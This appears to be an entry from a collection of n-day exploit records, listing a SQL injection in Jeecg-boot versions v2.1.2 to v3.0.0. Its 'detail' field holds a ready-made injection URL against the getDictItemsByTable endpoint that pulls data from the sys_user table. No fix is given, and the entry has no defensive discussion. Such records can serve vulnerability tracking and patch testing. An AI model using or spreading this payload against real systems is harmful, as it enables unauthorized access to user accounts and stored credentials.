vendor = "Jeecg-boot"
name = "Jeecg-boot SQL注入"
type = "SQL注入"
version = "v2.1.2-v3.0.0"
path = "/api/sys/ng-alain/getDictItemsByTable"
detail = "/api/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js"
fix = "未知"
date = "0721"
label = "nday"
verifier = "AdySec"
